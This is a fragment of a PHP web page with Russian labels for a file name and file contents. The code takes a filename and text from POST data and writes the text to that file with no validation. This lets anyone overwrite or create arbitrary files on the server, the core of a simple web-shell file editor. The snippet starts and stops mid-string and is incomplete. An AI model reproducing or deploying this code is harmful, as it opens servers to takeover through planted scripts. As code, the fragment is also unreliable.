Имя файла:
Содержание:
"; $edit = $_POST['edit']; $filename = $_POST['name']; $fd = fopen($filename, "w"); fwrite ($fd, $edit); @fclose ($fd); echo "